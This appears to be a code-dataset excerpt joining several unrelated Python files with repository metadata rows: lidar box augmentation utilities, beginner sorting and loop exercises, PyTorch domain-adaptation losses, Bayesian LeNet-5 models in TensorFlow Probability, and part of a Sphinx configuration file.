center_noise_std = np.array(center_noise_std, dtype=gt_boxes.dtype)
loc_noises = np.random.normal(scale=center_noise_std, size=[num_boxes, num_try, 3])
# loc_noises = np.random.uniform(
# -center_noise_std, center_noise_std, size=[num_boxes, num_try, 3])
rot_noises = np.random.uniform(
rotation_perturb[0], rotation_perturb[1], size=[num_boxes, num_try]
)
gt_grots = np.arctan2(gt_boxes[:, 0], gt_boxes[:, 1])
grot_lowers = global_random_rot_range[0] - gt_grots
grot_uppers = global_random_rot_range[1] - gt_grots
global_rot_noises = np.random.uniform(
grot_lowers[..., np.newaxis],
grot_uppers[..., np.newaxis],
size=[num_boxes, num_try],
)
if group_ids is not None:
if enable_grot:
set_group_noise_same_v2_(
loc_noises, rot_noises, global_rot_noises, group_ids
)
else:
set_group_noise_same_(loc_noises, rot_noises, group_ids)
group_centers, group_id_num_dict = get_group_center(gt_boxes[:, :3], group_ids)
if enable_grot:
group_transform_v2_(
loc_noises,
rot_noises,
gt_boxes[:, :3],
gt_boxes[:, 6],
group_centers,
global_rot_noises,
valid_mask,
)
else:
group_transform_(
loc_noises,
rot_noises,
gt_boxes[:, :3],
gt_boxes[:, 6],
group_centers,
valid_mask,
)
group_nums = np.array(list(group_id_num_dict.values()), dtype=np.int64)
origin = [0.5, 0.5, 0.5]
gt_box_corners = box_np_ops.center_to_corner_box3d(
gt_boxes[:, :3], gt_boxes[:, 3:6], gt_boxes[:, 6], origin=origin, axis=2
)
if group_ids is not None:
if not enable_grot:
selected_noise = noise_per_box_group(
gt_boxes[:, [0, 1, 3, 4, 6]],
valid_mask,
loc_noises,
rot_noises,
group_nums,
)
else:
selected_noise = noise_per_box_group_v2_(
gt_boxes[:, [0, 1, 3, 4, 6]],
valid_mask,
loc_noises,
rot_noises,
group_nums,
global_rot_noises,
)
else:
if not enable_grot:
selected_noise = noise_per_box(
gt_boxes[:, [0, 1, 3, 4, 6]], valid_mask, loc_noises, rot_noises
)
else:
selected_noise = noise_per_box_v2_(
gt_boxes[:, [0, 1, 3, 4, 6]],
valid_mask,
loc_noises,
rot_noises,
global_rot_noises,
)
loc_transforms = _select_transform(loc_noises, selected_noise)
rot_transforms = _select_transform(rot_noises, selected_noise)
surfaces = box_np_ops.corner_to_surfaces_3d_jit(gt_box_corners)
if points is not None:
point_masks = points_in_convex_polygon_3d_jit(points[:, :3], surfaces)
points_transform_(
points,
gt_boxes[:, :3],
point_masks,
loc_transforms,
rot_transforms,
valid_mask,
)
box3d_transform_(gt_boxes, loc_transforms, rot_transforms, valid_mask)
def noise_per_object_v2_(
gt_boxes,
points=None,
valid_mask=None,
rotation_perturb=np.pi / 4,
center_noise_std=1.0,
global_random_rot_range=np.pi / 4,
num_try=100,
):
"""random rotate or remove each groundtrutn independently.
use kitti viewer to test this function points_transform_
Args:
gt_boxes: [N, 7], gt box in lidar.points_transform_
points: [M, 4], point cloud in lidar.
"""
num_boxes = gt_boxes.shape[0]
if not isinstance(rotation_perturb, (list, tuple, np.ndarray)):
rotation_perturb = [-rotation_perturb, rotation_perturb]
if not isinstance(global_random_rot_range, (list, tuple, np.ndarray)):
global_random_rot_range = [-global_random_rot_range, global_random_rot_range]
if not isinstance(center_noise_std, (list, tuple, np.ndarray)):
center_noise_std = [center_noise_std, center_noise_std, center_noise_std]
if valid_mask is None:
valid_mask = np.ones((num_boxes,), dtype=np.bool_)
center_noise_std = np.array(center_noise_std, dtype=gt_boxes.dtype)
loc_noises = np.random.normal(scale=center_noise_std, size=[num_boxes, num_try, 3])
# loc_noises = np.random.uniform(
# -center_noise_std, center_noise_std, size=[num_boxes, num_try, 3])
rot_noises = np.random.uniform(
rotation_perturb[0], rotation_perturb[1], size=[num_boxes, num_try]
)
gt_grots = np.arctan2(gt_boxes[:, 0], gt_boxes[:, 1])
grot_lowers = global_random_rot_range[0] - gt_grots
grot_uppers = global_random_rot_range[1] - gt_grots
global_rot_noises = np.random.uniform(
grot_lowers[..., np.newaxis],
grot_uppers[..., np.newaxis],
size=[num_boxes, num_try],
)
origin = [0.5, 0.5, 0]
gt_box_corners = box_np_ops.center_to_corner_box3d(
gt_boxes[:, :3], gt_boxes[:, 3:6], gt_boxes[:, 6], origin=origin, axis=2
)
if np.abs(global_random_rot_range[0] - global_random_rot_range[1]) < 1e-3:
selected_noise = noise_per_box(
gt_boxes[:, [0, 1, 3, 4, 6]], valid_mask, loc_noises, rot_noises
)
else:
selected_noise = noise_per_box_v2_(
gt_boxes[:, [0, 1, 3, 4, 6]],
valid_mask,
loc_noises,
rot_noises,
global_rot_noises,
)
loc_transforms = _select_transform(loc_noises, selected_noise)
rot_transforms = _select_transform(rot_noises, selected_noise)
if points is not None:
surfaces = box_np_ops.corner_to_surfaces_3d_jit(gt_box_corners)
point_masks = points_in_convex_polygon_3d_jit(points[:, :3], surfaces)
points_transform_(
points,
gt_boxes[:, :3],
point_masks,
loc_transforms,
rot_transforms,
valid_mask,
)
box3d_transform_(gt_boxes, loc_transforms, rot_transforms, valid_mask)
def global_scaling(gt_boxes, points, scale=0.05):
if not isinstance(scale, list):
scale = [-scale, scale]
noise_scale = np.random.uniform(scale[0] + 1, scale[1] + 1)
points[:, :3] *= noise_scale
gt_boxes[:, :6] *= noise_scale
return gt_boxes, points
def global_rotation(gt_boxes, points, rotation=np.pi / 4):
if not isinstance(rotation, list):
rotation = [-rotation, rotation]
noise_rotation = np.random.uniform(rotation[0], rotation[1])
points[:, :3] = box_np_ops.rotation_points_single_angle(
points[:, :3], noise_rotation, axis=2
)
gt_boxes[:, :3] = box_np_ops.rotation_points_single_angle(
gt_boxes[:, :3], noise_rotation, axis=2
)
if gt_boxes.shape[1] > 7:
gt_boxes[:, 6:8] = box_np_ops.rotation_points_single_angle(
np.hstack([gt_boxes[:, 6:8], np.zeros((gt_boxes.shape[0], 1))]),
noise_rotation,
axis=2,
)[:, :2]
gt_boxes[:, -1] += noise_rotation
return gt_boxes, points
def random_flip(gt_boxes, points, probability=0.5):
enable = np.random.choice(
[False, True], replace=False, p=[1 - probability, probability]
)
if enable:
gt_boxes[:, 1] = -gt_boxes[:, 1]
gt_boxes[:, -1] = -gt_boxes[:, -1] + np.pi
points[:, 1] = -points[:, 1]
if gt_boxes.shape[1] > 7: # y axis: x, y, z, w, h, l, vx, vy, r
gt_boxes[:, 7] = -gt_boxes[:, 7]
return gt_boxes, points
def random_flip_both(gt_boxes, points, probability=0.5, flip_coor=None):
# x flip
enable = np.random.choice(
[False, True], replace=False, p=[1 - probability, probability]
)
if enable:
gt_boxes[:, 1] = -gt_boxes[:, 1]
gt_boxes[:, -1] = -gt_boxes[:, -1] + np.pi
points[:, 1] = -points[:, 1]
if gt_boxes.shape[1] > 7: # y axis: x, y, z, w, h, l, vx, vy, r
gt_boxes[:, 7] = -gt_boxes[:, 7]
# y flip
enable = np.random.choice(
[False, True], replace=False, p=[1 - probability, probability]
)
if enable:
if flip_coor is None:
gt_boxes[:, 0] = -gt_boxes[:, 0]
points[:, 0] = -points[:, 0]
else:
gt_boxes[:, 0] = flip_coor * 2 - gt_boxes[:, 0]
points[:, 0] = flip_coor * 2 - points[:, 0]
gt_boxes[:, -1] = -gt_boxes[:, -1] + 2*np.pi # TODO: CHECK THIS
if gt_boxes.shape[1] > 7: # y axis: x, y, z, w, h, l, vx, vy, r
gt_boxes[:, 6] = -gt_boxes[:, 6]
return gt_boxes, points
def global_scaling_v2(gt_boxes, points, min_scale=0.95, max_scale=1.05):
noise_scale = np.random.uniform(min_scale, max_scale)
points[:, :3] *= noise_scale
gt_boxes[:, :-1] *= noise_scale
return gt_boxes, points
def global_rotation_v2(gt_boxes, points, min_rad=-np.pi / 4, max_rad=np.pi / 4):
noise_rotation = np.random.uniform(min_rad, max_rad)
points[:, :3] = box_np_ops.rotation_points_single_angle(
points[:, :3], noise_rotation, axis=2
)
gt_boxes[:, :3] = box_np_ops.rotation_points_single_angle(
gt_boxes[:, :3], noise_rotation, axis=2
)
gt_boxes[:, -1] += noise_rotation
return gt_boxes, points
@numba.jit(nopython=True)
def box_collision_test(boxes, qboxes, clockwise=True):
N = boxes.shape[0]
K = qboxes.shape[0]
ret = np.zeros((N, K), dtype=np.bool_)
slices = np.array([1, 2, 3, 0])
lines_boxes = np.stack(
(boxes, boxes[:, slices, :]), axis=2
) # [N, 4, 2(line), 2(xy)]
lines_qboxes = np.stack((qboxes, qboxes[:, slices, :]), axis=2)
# vec = np.zeros((2,), dtype=boxes.dtype)
boxes_standup = box_np_ops.corner_to_standup_nd_jit(boxes)
qboxes_standup = box_np_ops.corner_to_standup_nd_jit(qboxes)
for i in range(N):
for j in range(K):
# calculate standup first
iw = min(boxes_standup[i, 2], qboxes_standup[j, 2]) - max(
boxes_standup[i, 0], qboxes_standup[j, 0]
)
if iw > 0:
ih = min(boxes_standup[i, 3], qboxes_standup[j, 3]) - max(
boxes_standup[i, 1], qboxes_standup[j, 1]
)
if ih > 0:
for k in range(4):
for l in range(4):
A = lines_boxes[i, k, 0]
B = lines_boxes[i, k, 1]
C = lines_qboxes[j, l, 0]
D = lines_qboxes[j, l, 1]
acd = (D[1] - A[1]) * (C[0] - A[0]) > (C[1] - A[1]) * (
D[0] - A[0]
)
bcd = (D[1] - B[1]) * (C[0] - B[0]) > (C[1] - B[1]) * (
D[0] - B[0]
)
if acd != bcd:
abc = (C[1] - A[1]) * (B[0] - A[0]) > (B[1] - A[1]) * (
C[0] - A[0]
)
abd = (D[1] - A[1]) * (B[0] - A[0]) > (B[1] - A[1]) * (
D[0] - A[0]
)
if abc != abd:
ret[i, j] = True # collision.
break
if ret[i, j] is True:
break
if ret[i, j] is False:
# now check complete overlap.
# box overlap qbox:
box_overlap_qbox = True
for l in range(4): # point l in qboxes
for k in range(4): # corner k in boxes
vec = boxes[i, k] - boxes[i, (k + 1) % 4]
if clockwise:
vec = -vec
cross = vec[1] * (boxes[i, k, 0] - qboxes[j, l, 0])
cross -= vec[0] * (boxes[i, k, 1] - qboxes[j, l, 1])
if cross >= 0:
box_overlap_qbox = False
break
if box_overlap_qbox is False:
break
if box_overlap_qbox is False:
qbox_overlap_box = True
for l in range(4): # point l in boxes
for k in range(4): # corner k in qboxes
vec = qboxes[j, k] - qboxes[j, (k + 1) % 4]
if clockwise:
vec = -vec
cross = vec[1] * (qboxes[j, k, 0] - boxes[i, l, 0])
cross -= vec[0] * (qboxes[j, k, 1] - boxes[i, l, 1])
if cross >= 0: #
qbox_overlap_box = False
break
if qbox_overlap_box is False:
break
if qbox_overlap_box:
ret[i, j] = True # collision.
else:
ret[i, j] = True # collision.
return ret
def global_translate_(gt_boxes, points, noise_translate_std):
"""
Apply global translation to gt_boxes and points.
"""
if not isinstance(noise_translate_std, (list, tuple, np.ndarray)):
noise_translate_std = np.array(
[noise_translate_std, noise_translate_std, noise_translate_std]
)
if all([e == 0 for e in noise_translate_std]):
return gt_boxes, points
noise_translate = np.array(
[
np.random.normal(0, noise_translate_std[0], 1),
np.random.normal(0, noise_translate_std[1], 1),
np.random.normal(0, noise_translate_std[0], 1),
]
).T
points[:, :3] += noise_translate
gt_boxes[:, :3] += noise_translate
return gt_boxes, points
if __name__ == "__main__":
bboxes = np.array(
[
[0.0, 0.0, 0.5, 0.5],
[0.2, 0.2, 0.6, 0.6],
[0.7, 0.7, 0.9, 0.9],
[0.55, 0.55, 0.8, 0.8],
]
)
bbox_corners = box_np_ops.minmax_to_corner_2d(bboxes)
print(bbox_corners.shape)
print(box_collision_test(bbox_corners, bbox_corners))
| 37.32651 | 88 | 0.552786 |
30e239408e1ecc4b3a0a09c52a722d47abb19835 | 612 | py | Python | ex080.py | rafaelclemes81/Python | 0e685b4e528a29bb23ecf11c9ccdbae8730b3ac3 | [
"MIT"
] | null | null | null | ex080.py | rafaelclemes81/Python | 0e685b4e528a29bb23ecf11c9ccdbae8730b3ac3 | [
"MIT"
] | null | null | null | ex080.py | rafaelclemes81/Python | 0e685b4e528a29bb23ecf11c9ccdbae8730b3ac3 | [
"MIT"
] | null | null | null | ''' CRIE UM PROGRAMA ONDE O USUÁRIO POSSA DIGITAR CINCO VALORES NUMÉRICOS E CADASTRE-OS EM UMA LISTA
JÁ NA POSIÇÃO CORRETA DE INSERÇÃO (SEM UTILIZAR O SORT). NO FINAL MOSTRE A LISTA ORDENADA NA TELA'''
lista = list()
for c in range(0,5):
n = int(input('Digite um valor: '))
if c == 0 or n > lista[-1]: # poderia usar na última expressão lista[len(lista)-1]
lista.append(n)
else:
pos = 0
while pos < len(lista):
if n <= lista[pos]:
lista.insert(pos, n)
break
pos += 1
print(f'O valores digitados em ordem foram {lista}')
| 38.25 | 100 | 0.599673 |
c83cd425aa75a93b630f78eac26c53ceee6714b7 | 5,068 | py | Python | utils/loss.py | weigq/UDA-1 | 4f97980980cafd0a2d02a77211ac7dbaf3e331f6 | [
"MIT"
] | 32 | 2021-11-08T15:45:30.000Z | 2022-03-30T09:08:57.000Z | utils/loss.py | weigq/UDA-1 | 4f97980980cafd0a2d02a77211ac7dbaf3e331f6 | [
"MIT"
] | 3 | 2021-11-16T02:38:51.000Z | 2022-02-21T13:29:58.000Z | utils/loss.py | weigq/UDA-1 | 4f97980980cafd0a2d02a77211ac7dbaf3e331f6 | [
"MIT"
] | 4 | 2021-11-09T02:53:18.000Z | 2021-12-21T22:11:35.000Z | # --------------------------------------------------------
# Copyright (c) 2021 Microsoft
# Licensed under The MIT License
# --------------------------------------------------------
import torch
from torch import Tensor
import torch.nn as nn
from utils.torch_funcs import grl_hook, entropy_func
class WeightBCE(nn.Module):
def __init__(self, epsilon: float = 1e-8) -> None:
super(WeightBCE, self).__init__()
self.epsilon = epsilon
def forward(self, x: Tensor, label: Tensor, weight: Tensor) -> Tensor:
"""
:param x: [N, 1]
:param label: [N, 1]
:param weight: [N, 1]
"""
label = label.float()
cross_entropy = - label * torch.log(x + self.epsilon) - (1 - label) * torch.log(1 - x + self.epsilon)
return torch.sum(cross_entropy * weight.float()) / 2.
def d_align_uda(softmax_output: Tensor, features: Tensor = None, d_net=None,
coeff: float = None, ent: bool = False):
loss_func = WeightBCE()
d_input = softmax_output if features is None else features
d_output = d_net(d_input, coeff=coeff)
d_output = torch.sigmoid(d_output)
batch_size = softmax_output.size(0) // 2
labels = torch.tensor([[1]] * batch_size + [[0]] * batch_size).long().cuda() # 2N x 1
if ent:
x = softmax_output
entropy = entropy_func(x)
entropy.register_hook(grl_hook(coeff))
entropy = torch.exp(-entropy)
source_mask = torch.ones_like(entropy)
source_mask[batch_size:] = 0
source_weight = entropy * source_mask
target_mask = torch.ones_like(entropy)
target_mask[:batch_size] = 0
target_weight = entropy * target_mask
weight = source_weight / torch.sum(source_weight).detach().item() + \
target_weight / torch.sum(target_weight).detach().item()
else:
weight = torch.ones_like(labels).float() / batch_size
loss_alg = loss_func.forward(d_output, labels, weight.view(-1, 1))
return loss_alg
def d_align_msda(softmax_output: Tensor, features: Tensor = None, d_net=None,
coeff: float = None, ent: bool = False, batchsizes: list = []):
d_input = softmax_output if features is None else features
d_output = d_net(d_input, coeff=coeff)
labels = torch.cat(
(torch.tensor([1] * batchsizes[0]).long(), torch.tensor([0] * batchsizes[1]).long()), 0
).cuda() # [B_S + B_T]
if ent:
x = softmax_output
entropy = entropy_func(x)
entropy.register_hook(grl_hook(coeff))
entropy = torch.exp(-entropy)
source_mask = torch.ones_like(entropy)
source_mask[batchsizes[0]:] = 0
source_weight = entropy * source_mask
target_mask = torch.ones_like(entropy)
target_mask[:batchsizes[0]] = 0
target_weight = entropy * target_mask
weight = source_weight / torch.sum(source_weight).detach().item() + \
target_weight / torch.sum(target_weight).detach().item()
else:
weight = torch.ones_like(labels).float() / softmax_output.shape[0]
loss_ce = nn.CrossEntropyLoss(reduction='none')(d_output, labels)
loss_alg = torch.sum(weight * loss_ce)
return loss_alg
class MMD(nn.Module):
def __init__(self, kernel_mul=2.0, kernel_num=5):
super(MMD, self).__init__()
self.kernel_num = kernel_num
self.kernel_mul = kernel_mul
self.fix_sigma = None
def _guassian_kernel(self, source, target, kernel_mul=2.0, kernel_num=5, fix_sigma=None):
n_samples = int(source.size()[0]) + int(target.size()[0])
total = torch.cat([source, target], dim=0)
total0 = total.unsqueeze(0).expand(int(total.size(0)), int(total.size(0)), int(total.size(1)))
total1 = total.unsqueeze(1).expand(int(total.size(0)), int(total.size(0)), int(total.size(1)))
L2_distance = ((total0 - total1) ** 2).sum(2)
if fix_sigma:
bandwidth = fix_sigma
else:
bandwidth = torch.sum(L2_distance.data) / (n_samples ** 2 - n_samples)
bandwidth /= kernel_mul ** (kernel_num // 2)
bandwidth_list = [bandwidth * (kernel_mul ** i) for i in range(kernel_num)]
kernel_val = [torch.exp(-L2_distance / bandwidth_temp) for bandwidth_temp in bandwidth_list]
return sum(kernel_val)
def forward(self, source, target):
# number of used samples
batch_size = int(source.size()[0])
kernels = self._guassian_kernel(source, target, kernel_mul=self.kernel_mul, kernel_num=self.kernel_num,
fix_sigma=self.fix_sigma)
XX = kernels[:batch_size, :batch_size]
YY = kernels[batch_size:, batch_size:]
XY = kernels[:batch_size, batch_size:]
YX = kernels[batch_size:, :batch_size]
loss = torch.mean(XX) + torch.mean(YY) - torch.mean(XY) - torch.mean(YX)
return loss
| 38.687023 | 112 | 0.597869 |
ec6a340faa63755296500279ec2eed105ea305b8 | 2,321 | py | Python | tensorflow_probability/my_tfp_bdl/models/bayesian_lenet5.py | zhoudoao-bayes/tf-probability | 2c8975cad9ab4103f4fb2b277c4ed0763a488796 | [
"Apache-2.0"
] | null | null | null | tensorflow_probability/my_tfp_bdl/models/bayesian_lenet5.py | zhoudoao-bayes/tf-probability | 2c8975cad9ab4103f4fb2b277c4ed0763a488796 | [
"Apache-2.0"
] | null | null | null | tensorflow_probability/my_tfp_bdl/models/bayesian_lenet5.py | zhoudoao-bayes/tf-probability | 2c8975cad9ab4103f4fb2b277c4ed0763a488796 | [
"Apache-2.0"
] | null | null | null | # zhoudoao@foxmail.com
# 2020.5.12
""" Bayesian LeNet-5 and LeNet-5 model.
"""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import tensorflow.compat.v2 as tf
import tensorflow_probability as tfp
tf.enable_v2_behavior()
tfd = tfp.distributions
def bayesian_lenet5(num_classes,
kl_divergence_function):
model = tf.keras.models.Sequential([
tfp.layers.Convolution2DFlipout(
6, kernel_size=5, padding='SAME',
kernel_divergence_fn=kl_divergence_function,
activation=tf.nn.relu),
tf.keras.layers.MaxPooling2D(
pool_size=[2, 2], strides=[2, 2],
padding='SAME'),
tfp.layers.Convolution2DFlipout(
16, kernel_size=5, padding='SAME',
kernel_divergence_fn=kl_divergence_function,
activation=tf.nn.relu),
tf.keras.layers.MaxPooling2D(
pool_size=[2, 2], strides=[2, 2],
padding='SAME'),
tfp.layers.Convolution2DFlipout(
120, kernel_size=5, padding='SAME',
kernel_divergence_fn=kl_divergence_function,
activation=tf.nn.relu),
tf.keras.layers.Flatten(),
tfp.layers.DenseFlipout(
84, kernel_divergence_fn=kl_divergence_function,
activation=tf.nn.relu),
tfp.layers.DenseFlipout(
num_classes, kernel_divergence_fn=kl_divergence_function,
activation=tf.nn.softmax)
])
return model
def lenet5(num_classes, activation=tf.nn.relu):
model = tf.keras.models.Sequential([
tf.keras.layers.Conv2D(6, kernel_size=5, padding='SAME',
activation=activation),
tf.keras.layers.MaxPooling2D(pool_size=[2, 2],
strides=[2, 2], padding='SAME'),
tf.keras.layers.Conv2D(16, kernel_size=5, padding='SAME',
activation=activation),
tf.keras.layers.MaxPooling2D(pool_size=[2, 2], strides=[2, 2],
padding='SAME'),
tf.keras.layers.Conv2D(120, kernel_size=5, padding='SAME',
activation=activation),
tf.keras.layers.Flatten(),
tf.keras.layers.Dense(84, activation=activation),
tf.keras.layers.Dense(num_classes, activation=tf.nn.softmax)
])
return model
| 31.364865 | 70 | 0.638949 |
e3f787eeffcd480f5b455b1bad4e227fabeff746 | 73 | py | Python | ch7/7_6.py | hajin-kim/2020-HighSchool-Python-Tutoring | 352025a954bff37d21cc3d59e7d5e0f0269a1f17 | [
"MIT"
] | null | null | null | ch7/7_6.py | hajin-kim/2020-HighSchool-Python-Tutoring | 352025a954bff37d21cc3d59e7d5e0f0269a1f17 | [
"MIT"
] | null | null | null | ch7/7_6.py | hajin-kim/2020-HighSchool-Python-Tutoring | 352025a954bff37d21cc3d59e7d5e0f0269a1f17 | [
"MIT"
] | null | null | null | n = int(input("횟수 입력: "))
for i in range(n):
print(i+1)
print("반복 끝!")
| 12.166667 | 25 | 0.547945 |
1504ef5ebbcec937b7b358d4300870e0d20906ea | 9,006 | py | Python | leo/peakparser/peakparser.py | jfizzy/ResistanceDB | 829d2912c92f645172cdc984a5a2e6119eae8226 | [
"MIT"
] | null | null | null | leo/peakparser/peakparser.py | jfizzy/ResistanceDB | 829d2912c92f645172cdc984a5a2e6119eae8226 | [
"MIT"
] | null | null | null | leo/peakparser/peakparser.py | jfizzy/ResistanceDB | 829d2912c92f645172cdc984a5a2e6119eae8226 | [
"MIT"
] | null | null | null | ''' packages '''
#import traceback
#import sys
import csv
import re
import peakparser.peak as peak_module
class PeakParser:
""" Reads in a list of peaks generated by MAVEN and removes excess unecessary data """
def __init__(self, config):
""" Constructor for filereader"""
self.data_offset = 24
self._intensities = {}
self._colnames = {}
self._config = config
# parse a peaks file
# fields we are interested in (0 aligned):
# 4: medMz
# 5: medRt
# 8: compound
# 9: compound ID (usually same as compound)
# 10: category
# 12: expectedRtDiff, different betwene found RT and medRt
# 14: parent
# 15-24: not used
# 24+ mzXML peak data (column name might be of interest)
def parse_peaks_file(self):
""" Parse a given peaks file assumed to be tabbed delimited """
filename = self._config.PEAKS_FILE
peaks = None
try:
print("trying to open {}".format(filename))
with open(filename, 'rt') as csvfile:
reader = csv.reader(csvfile, delimiter='\t')
#to hold the peak data
peaks = []
# headers - might be important later
# they are the name of the mzXML sample file
row = reader.__next__()
col_names = [str(s).lower() for s in row[self.data_offset:] if s != ""]
# store column names in format {index: (name, time)}
# note that index is an offset into the data index (24), starting from 0.
for idx, col_name in enumerate(col_names):
self._colnames[idx] = self.strip_col_name(col_name)
for row in reader:
#holds the intensities
intensities = {}
# ensure there is actual data in the peak file
if len(row) > self.data_offset:
med_mz = float(row[4])
med_rt = float(row[5])
compound = str(row[8])
category = str(row[10])
rt_diff = float(row[12])
parent = float(row[14])
#for all the data rows
for col in range(24, len(row)):
cname = self._colnames[col - self.data_offset][0]
time = self._colnames[col - self.data_offset][1]
#don't include blank samples
if "blank" in cname:
continue
#if we have not seen this test, add as first value in test
if cname in intensities:
intensities[cname][time] = float(row[col])
#else add to tests
else:
intensities[cname] = {time: float(row[col])}
peak = peak_module.Peak(med_mz, med_rt, compound, \
category, rt_diff, parent, intensities)
# Ensure that the rt_diff is no larger than 0.05
if peak.verify_rt_diff(self._config.MAXRTDIFF):
# ensure that the peaks have intensity of at least 50000 and a ratio of .5 is present
if peak.verify_instensity_dispartiy(self._config.MZRATIO, self._config.MINMZ):
peaks.append(peak)
except IndexError as ex:
print("Error reading in csv file. Error message: {}".format(str(ex)))
return None
except:
print("Bad open")
return peaks
def strip_col_name(self, col_name):
""" returns the column name and time of T-value """
time_re = r"t[0-9]+"
findstr = "hilicneg15_"
index = col_name.find(findstr, 0, len(col_name))
if index != -1:
cutoff = index + len(findstr)
sample_name = col_name[cutoff:]
sample_name = sample_name.replace(".mzxml", "")
times = re.findall(time_re, sample_name)
if times:
time = str(times[0])
else:
time = "mid"
#remove t# from end of sample name
time_cutoff = sample_name.find(time, 0, len(sample_name))
if index != -1:
sample_name = sample_name[0:time_cutoff-1]
else:
return (-1, None)
return (sample_name, time)
def write_condensed_csv(self, peaks):
""" Condenses the peak information
Example: If t0 = 100 and t4 = 10000, then there was a difference of 9900 for this compound
for some organism
"""
filename = self._config.CONDENSED_FILE
if isinstance(peaks, list):
if peaks and isinstance(peaks[0], peak_module.Peak):
with open(filename, "w+") as csvfile:
csvwriter = csv.writer(csvfile, delimiter="\t", quotechar="\"", lineterminator='\n')
# write headers
row = ["medMz", "medRt", "compound", "category", "rt_diff", "parent"]
for colname, _ in peaks[0].intensities.items():
row.append(colname)
csvwriter.writerow(row)
for peak in peaks:
row = [str(peak.med_mz), str(peak.med_rt), str(peak.compound), str(peak.category), str(peak.rt_diff), str(peak.parent)]
for _, tests in peak.intensities.items():
difference = None
if len(tests) >= 2:
for _, value in tests.items():
if not difference:
difference = value
else:
ratio = 1
if max(difference, value) != 0:
ratio = 1 - (min(difference, value) / max(difference, value))
if ratio > .5:
difference = value - difference
else:
difference = 0
row.append(difference)
else:
row.append(0)
csvwriter.writerow(row)
else:
print("Input must be of type peak")
else:
print("Input must be a list of peaks.")
def write_peaks_csv(self, peaks):
""" Writes a list of peaks to csv file """
filename = self._config.OUTPUT_FILE
if isinstance(peaks, list):
if peaks and isinstance(peaks[0], peak_module.Peak):
try:
## should add a regex to check filenamet
with open(filename, "w+") as csvfile:
csvwriter = csv.writer(csvfile, delimiter="\t", quotechar="\"", lineterminator='\n')
row = ["medMz", "medRt", "compound", "category", "rt_diff", "parent"]
#first write the columns as they appear in peaks
for colname, tests in peaks[0].intensities.items():
for test_time, _ in tests.items():
row.append(colname + "_" + test_time)
csvwriter.writerow(row)
for peak in peaks:
row = [str(peak.med_mz), str(peak.med_rt), str(peak.compound), str(peak.category), str(peak.rt_diff), str(peak.parent)]
intensities = []
for _, tests in peak.intensities.items():
for _, value in tests.items():
intensities.append(value)
row = row + [str(intensity) for intensity in intensities]
#print(row)
csvwriter.writerow(row)
except Exception as ex:
print("Error writing csv file...{}".format(str(ex)))
else:
if not peaks == 0:
print("Attempted to write empty peaks list.")
if not isinstance(peaks[0], peak_module.Peak):
print("Received unknown list element type. Exiting.")
return
else:
print("Input must be a list of Peak type.")
return
| 40.936364 | 147 | 0.462025 |
9e55d0fafb702791f6fddc743a30892cd8fd97f6 | 1,076 | py | Python | SelectionSort.py | sairohithpasala/Sorting-Algorithms | 73d24bdf40a0b5ef79bd72275835319c32666338 | [
"MIT"
] | null | null | null | SelectionSort.py | sairohithpasala/Sorting-Algorithms | 73d24bdf40a0b5ef79bd72275835319c32666338 | [
"MIT"
] | null | null | null | SelectionSort.py | sairohithpasala/Sorting-Algorithms | 73d24bdf40a0b5ef79bd72275835319c32666338 | [
"MIT"
] | null | null | null | # Python program for SELECTION SORT
import timeit
def SelectSort(Arr):
# Traverse through all array elements
for i in range(len(Arr)):
# gather the minimal element in remaining unsorted array
min_index = i
for j in range(i+1, len(Arr)):
if Arr[min_index] > Arr[j]:
min_index = j
# Swap the found min element with the first
Arr[i], Arr[min_index] = Arr[min_index], Arr[i]
# Main Code to pass input
Arr=[]
n = int(input("Enter number of elements : "))
print ("Enter the array")
for i in range(0, n):
ele = int(input()) #Input the data into the list
Arr.append(ele)
print ("Given array is", end="\n")
print(Arr)
print('\n')
start = timeit.default_timer()
SelectSort(Arr) #passing the array to be sorted through function
print ("Sorted array with Selection Sort is: \t\t\t")
print(Arr)
stop = timeit.default_timer()
print("Execution Time is",stop - start,"seconds")
| 29.888889 | 104 | 0.577138 |
506e091d5e612f147c17ddaf220c58b64b38911d | 16,695 | py | Python | docs/conf.py | MrMonkey94/causalnex | 96f110cedccd6e84297bb4382d92fd9e725bfc13 | [
"Apache-2.0"
] | 1 | 2020-01-29T17:08:32.000Z | 2020-01-29T17:08:32.000Z | docs/conf.py | MrMonkey94/causalnex | 96f110cedccd6e84297bb4382d92fd9e725bfc13 | [
"Apache-2.0"
] | null | null | null | docs/conf.py | MrMonkey94/causalnex | 96f110cedccd6e84297bb4382d92fd9e725bfc13 | [
"Apache-2.0"
] | 1 | 2020-01-29T17:08:35.000Z | 2020-01-29T17:08:35.000Z | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
#
# causalnex documentation build configuration file,
# created by, sphinx-quickstart on Mon Dec 18 11:31:24 2017.
#
# This file is execfile()d with the current directory set to its
# containing dir.
#
# Note that not all possible configuration values are present in this
# autogenerated file.
#
# All configuration values have a default; values that are commented out
# serve to show the default.
import importlib
import re
import shutil
import sys
from distutils.dir_util import copy_tree
from inspect import getmembers, isclass, isfunction
from pathlib import Path
from typing import List
import patchy
from click import secho, style
from sphinx.ext.autosummary.generate import generate_autosummary_docs
from causalnex import __version__ as release
# -- Project information -----------------------------------------------------
project = "causalnex"
copyright = "2020, QuantumBlack"
author = "QuantumBlack"
# The short X.Y version.
version = re.match(r"^([0-9]+\.[0-9]+).*", release).group(1)
# -- General configuration ---------------------------------------------------
# If your documentation needs a minimal Sphinx version, state it here.
#
# needs_sphinx = '1.0'
# Add any Sphinx extension module names here, as strings. They can be
# extensions coming with Sphinx (named 'sphinx.ext.*') or your custom
# ones.
extensions = [
"sphinx.ext.autodoc",
"sphinx.ext.autosummary",
"sphinx.ext.napoleon",
"sphinx_autodoc_typehints",
"sphinx.ext.doctest",
"sphinx.ext.todo",
"sphinx.ext.coverage",
"sphinx.ext.mathjax",
"sphinx.ext.ifconfig",
"sphinx.ext.viewcode",
"nbsphinx",
"recommonmark",
"sphinx_markdown_tables",
"sphinx_copybutton",
]
# enable autosummary plugin (table of contents for modules/classes/class
# methods)
autosummary_generate = True
autosummary_imported_members = True
# Add any paths that contain templates here, relative to this directory.
templates_path = ["_templates"]
# The suffix(es) of source filenames.
# You can specify multiple suffix as a list of string:
#
source_suffix = {".rst": "restructuredtext", ".md": "markdown"}
# The master toctree document.
master_doc = "index"
# The language for content autogenerated by Sphinx. Refer to documentation
# for a list of supported languages.
#
# This is also used if you do content translation via gettext catalogs.
# Usually you set "language" from the command line for these cases.
language = None
# List of patterns, relative to source directory, that match files and
# directories to ignore when looking for source files.
